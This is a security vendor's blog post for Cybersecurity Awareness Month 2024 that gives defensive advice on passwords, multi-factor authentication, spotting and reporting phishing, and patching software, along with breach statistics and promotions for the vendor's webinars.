Cybersecurity Awareness Month
We rely on today’s world to be more interconnected than ever, out of both necessity to make crucial decisions quicker in order to save lives, and out of convenience of sharing information across platforms and technology.
Cyber awareness is also more important every single day with the continuing increased reliance on interconnectivity and the internet of things (IoT). Increased reliance on technology and connectivity also creates more potential vulnerabilities for cyber threat actors to attempt to exploit.
That’s why cybersecurity awareness is important everyday, and is highlighted to an even greater extent by the Cybersecurity and Infrastructure Agency (CISA) during Cybersecurity Awareness Month each October. It provides a great platform to engage a wider audience to focus on reducing online risks with direct messages and actionable advice.
CISA’s continuing message for Cybersecurity Awareness Month in 2024 is “Secure Our World” highlighting that good cyber awareness practices and creating strong cyber posture requires buy-in and active participation from everyone in critical infrastructure organizations.
Four Key Steps to Better Cybersecurity Posture for Cybersecurity Awareness Month
- Use Strong Passwords
- Recognize and Report Phishing
- Turn on Multi-Factor Authentication
- Update Software
Use Strong Passwords
The 2024 Breached Password Report found that compromised login credentials were responsible for a significant portion of cyberattacks, with 80% of successful breaches stemming from weak or stolen passwords.
Developing, documenting and enforcing strong password policies is the best way to make sure everyone in your organization is following the best cyber awareness and password practices to avoid falling victim to having credentials stolen.
However, some organizations have gone away from that with some policies leading to complicated passwords that are hard to remember.
Password management tools can be helpful, but be aware these these tools are being targeted by cyber criminals and have been hacked as well.
Why are strong passwords a part of cyber awareness month and creating strong cyber posture?
A cyber criminal’s ability to crack even just one password to one account in your organization can compromise the cyber resiliency of your entire network. Gaining access to one account can lead to escalating privileges across your network with tactics like password spraying, which is why creating strong passwords and password policies are critical.
{Learn more about creating cyber resiliency by downloading our free on-demand webinar – Creating Cyber Resiliency: Policies, Procedures and Planning)
In Verizon’s 2024 Data Breach Investigation Report, stolen credentials were involved in 83% of breaches in Public Administration with a total of 1,085 incidents with confirmed data disclosure.
Estimated Time It Takes To Crack A Password?
The rapid advancement of artificial intelligence is continually cutting down the time cyber criminals need to crack passwords.
Studies from 2023 and 2024 show that 51% of common passwords can be cracked in under a minute, and 65% within an hour. For example, AI tools such as PassGAN can crack a 7-character password in less than six minutes, even if it includes a symbol.
(Download our free webinar: Rise of AI in Cyber Warfare: Threats and Threat Detection to see examples of how AI is making password cracking easier.)
What Should Go Into Constructing A Strong Password?
- Password Length
- 8 is too short! Go for minimum of 12, preferably 14+
- Complexity
- Mix it up – but in a way you can remember!
- Randomness
- Predictability will kill the above items
- Freshness
- Be prepared if your agency forces password changes
- Be creative
- Use different passwords each time – don’t “tweak”
- Lock out users after three failures
- But not forever – ten minutes is sufficient
What SHOULD you avoid when creating a password, and what advice should you include in a password policy?
- Avoid consecutive keyboard combinations
- qwerty or asdfg
- 123456
- Avoid names & birthdays (PII)
- Kids, spouse, pets, or other relatives
- These can often be found easily on social media
- Same rules apply to security questions
- Resetting your password could give them access & lock you out (this is evidence you may have been compromised).
(Learn more about password policies in our free webinar – Practical Principles for PSAPS)
Strong passwords are your first line of defense against cyber threats. Don’t settle for weak combinations.
Turn On Multi-Factor Authentication
Strong passwords alone aren’t enough, which is why Cybersecurity Awareness Month touts the importance of multi-factor authentication. In the event a password is compromised, two-factor authentication creates a barrier where the person trying to login to an account will also need to provide additional information or actions to complete the login.
Two-Factor Authentication Example:
- Enter Password
- Enter Passcode sent via text or email to phone
- Biometrics
- Security Keys
- Links
Multi-factor authentication information typically includes:
- What you carry
- Keys
- ID card
- Phone
- Who you are
- Retinal scan
- Fingerprint
- What you know
- Passwords
(This is also covered in our free webinar, Creating Cyber Resiliency: Policies, Procedures and Planning)
Where should you use MFA?
- On accounts with your financial info like banks and online stores
- On accounts with personal info, like social media and healthcare apps
- On accounts with info you use for work
Passwordless options are also becoming more popular, because the prospect of not having to remember multiple, complicated passwords or just not having a password that could be compromised does reduce some risk and burden.
However, challenges such as legacy technology, training, data privacy, interoperability, and regulatory considerations are still a barrier to wider adoption of this practice. Which is why strong passwords and multi-factor authentication still have great importance until more of these barriers can be addressed.
Multifactor itself is not enough and is also a target of cyber criminals with evolving tools. In fact, the 2024 State of Phishing Report found that there are over 1 million attacks launched a month with MFA-bypass framework.
Recognize And Report Phishing
Exploiting the human element still proves to be the most used cyber attack method by cyber criminals, because it remains the most effective. Convincing people to willingly give up login credentials and other sensitive information through emails, clicking links and utilizing public information made available by anyone makes it so cyber criminals don’t need to spend a lot of resources on more sophisticated attack methods.
The low-effort and highly-effective method of phishing attacks in many forms is a key reason why recognizing and reporting phishing is a main element of focus during Cybersecurity Awareness Month.
How Prevalent Is Phishing?
- 90% of all cyber attacks begin with phishing (CISA)
- As of Q1 2024, it is estimated that 3.4 billion phishing emails are sent a day and about 36% of all data breaches involve phishing
- There are now nearly 75 times as many phishing sites as there are other malware sites on the internet (Google Safe Browsing)
- The APWG observed 1,077,501 phishing attacks in the 4th quarter of 2023
- APWG observed almost 5 million phishing attacks in 2023, the worst year for phishing on record
- 8 out of 10 organizations had 1 person fall victim to a phishing attempt.
6 Most Common Phishing Attacks
- Deceptive Phishing
- Email from recognized sender or impersonating legitimate entity to gain personal data or login credentials
- Spear Phishing
- Common on social media. Customized attack using information or people target is familiar with to click on malicious links to gain data/credentials
- Whaling
- Attempting to gain access to a CEO’s email to authorize financial transfers or gain access to data to sell on dark web.
- Vishing
- Uses a phone call, ID spoofing to mimick entities to steal sensitive data/funds
- Smishing
- Uses text to get target to click on malicious links
- Pharming
- Targets a DNS server and changes the IP address associated with an alphabetical website name to redirect users to a malicious website of their choice.
(Get experts insights into different phishing methods to be aware of and how to strengthen your cyber posture in our webinar – Phishing Tournaments: Don’t Get Caught in the Net.)
Train To Recognize And Report Phishing Attempts
Awareness makes you up to 40% safer against potential phishing scams and attacks.
Training to recognize and report phishing attempts is more important than ever with the impact AI is also having on phishing attempts. Cyber criminals have been able to utilize AI and tools similar to ChatGPT and develop their own language learning programs to write more realistic phishing emails.
What does training to recognize phishing scams look like?
Setting up a training course for your organization to learn how to spot the signs of a potential phishing email and remind them to report it.
A very basic and easy phishing training tip that everyone should follow is utilizing the ‘3 Second’ Rule.’ Take a moment to think before you click on a link or an attachment in an email. Is it urgent? Are you expecting it? Those are things you should take a few seconds to think about before clicking a link in any email.
AI Used To Write Phishing Emails
Artificial intelligence is probably having a bigger impact on phishing attempts than it is on password cracking. This makes training to spot phishing emails more important as AI can make the language in these emails nearly unrecognizable. Normally, you would look for spelling errors, grammar mistakes and other odd phrasing as a sign of spotting a phishing email. But AI has cleaned a lot of that up, making it more difficult than ever.
Social Engineering And Phishing
The main tool cyber criminals use in phishing attempts is yourself. Not only are they hoping for bad cyber awareness practices, such as not thinking before clicking on links, but finding information that is relevant to you is their best weapon, and we make it easier to find than ever. Cyber criminals will use familiarity, curiosity, and fear to manipulate a target’s behavior to gain access to critical systems, data, and infrastructure.
Update Software
If weak passwords, lack of multi-factor authentication tools, and not training for phishing awareness make it easy for cyber criminals to attack critical networks, not updating software or applying security patches to address flaws make it just as easy, if not easier, for these cyber criminals to breach your network. Even worse, exploiting unpatched security flaws can allow cyber criminals to bypass security methods such as MFA.
Zero-day exploits surged significantly in 2023, with a notable 50% increase in vulnerabilities compared to 2022. Google observed 97 zero-day vulnerabilities actively exploited in 2023.
(Learn lessons from our cyber experts about how to handle zero-day exploits and protecting your network, including software updates and patching in our free, on-demand webinar – What Can I Do About Zero Day Exploits?)
These attacks are highly relevant in public safety and government because these sectors often rely on third-party vendors for security solutions. The use of these enterprise technologies makes them susceptible to zero-day vulnerabilities, which, once exploited, can lead to large-scale data breaches or compromise critical infrastructure.
This is a big reason why updating software is a key area of focus during Cybersecurity Awareness Month again in 2024.
Any device or software being used through a connection and your network is vulnerable to risks. Updates from any software or applications being used are important to install, especially to patch any security flaws.
How to Reduce the Impact of Zero Day Vulnerabilities
(Patching and software updates continues to be one of the biggest lessons learned from cyber attacks. Get more insights from our experts into what to take away from cyber threats in 2023, Lessons Learned From 2023’s Cyber Worst.)
Patch management (as soon as available)
- Vulnerability management
- Attack surface management (ASM)
- Threat intelligence
- Anomaly-based detection methods
Automated patch management can help you deploy it quickly before attackers can identify the vulnerability in your systems and exploit it.
Vulnerability assessments also provide an organization with the necessary knowledge, awareness and risk backgrounds to understand and react to threats to its environment.
Log4shell was one of the most devastating software flaws we have seen in the past several years. Applying immediate patches and updates to new versions of Log4J was among the most important steps to take in order to mitigate further and future damage against possible exploits from the vulnerability.
- In 2023, zero-day exploits increased significantly, with 97 vulnerabilities actively exploited in the wild, marking a 50% rise from 2022
- Reports from 2023 revealed that over 60% of network and security appliances had zero-day vulnerabilities that were exploited before patches were available
Cybersecurity awareness and building cyber resiliency is a team effort and it takes buy-in from your entire organization to help keep your network ready to fight and respond to inevitable cyber threats.
Take advantage of SecuLore’s free cybersecurity resources, from our webinars, blogs, and cyber alerts, as well as our cyber attack database to help you stay up to date on the latest cyber threats and news that impacts your area and industry.
Contact SecuLore today to get help finding cybersecurity solutions, including training for phishing and other best cyber awareness practices for your entire organization, identifying network vulnerabilities with actionable solutions to address them, and our 24/7/365 human monitored SOC team to respond to cyber incidents.
Stay cyber-safe,
Contents
Other Resources
- Cybersecurity Awareness Month 2024: Steps to Secure Your Network
- Strengthen Your Defenses: The Essential Steps for Conducting a Cybersecurity Gap Analysis
- Insider Threat Awareness: Protecting Your Network From Within
- Practical Cybersecurity Principles for PSAPs | eBook
- Understanding the New CJIS Cybersecurity Requirements: A Guide